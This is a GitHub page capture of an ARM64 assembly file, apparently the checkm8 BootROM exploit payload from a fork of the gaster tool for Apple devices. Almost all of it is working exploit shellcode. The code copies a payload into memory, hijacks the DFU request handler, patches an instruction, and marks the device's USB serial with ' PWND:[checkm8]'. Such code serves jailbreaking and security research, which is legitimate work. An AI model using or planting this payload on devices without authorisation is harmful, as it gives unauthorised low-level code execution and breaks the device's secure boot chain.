forked from 0x7ff/gaster
-
Notifications
You must be signed in to change notification settings - Fork 0
/
payload_notA9.S
65 lines (62 loc) · 1.78 KB
/
payload_notA9.S
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
/* Copyright 2022 0x7ff
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.text
.align 2
.pool
.set payload_dest, 0x7FFFFFF0
.set dfu_handle_request, 0x7FFFFFF1
.set payload_off, 0x7FFFFFF2
.set payload_sz, 0x7FFFFFF3
.set memcpy_addr, 0x7FFFFFF4
.set gUSBSerialNumber, 0x7FFFFFF5
.set usb_create_string_descriptor, 0x7FFFFFF6
.set usb_serial_number_string_descriptor, 0x7FFFFFF7
.set patch_addr, 0x7FFFFFF8
.set total_received, 0x7FFFFFF9
.global _main
_main:
stp x29, x30, [sp, #-0x10]!
ldr x0, =payload_dest
ldr x3, =dfu_handle_request
add x1, x0, #0xC
str x1, [x3]
adr x1, _main
ldr x2, =payload_off
add x1, x1, x2
ldr x2, =payload_sz
ldr x3, =memcpy_addr
blr x3
ldr x0, =gUSBSerialNumber
_find_zero_loop:
add x0, x0, #1
ldrb w1, [x0]
cbnz w1, _find_zero_loop
adr x1, PWND_STR
ldp x2, x3, [x1]
stp x2, x3, [x0]
ldr x0, =gUSBSerialNumber
ldr x1, =usb_create_string_descriptor
blr x1
ldr x1, =usb_serial_number_string_descriptor
strb w0, [x1]
mov w0, #0xD2800000
ldr x1, =patch_addr
str w0, [x1]
ldr x0, =total_received
str wzr, [x0]
ldp x29, x30, [sp], #0x10
ret
PWND_STR:
.asciz " PWND:[checkm8]"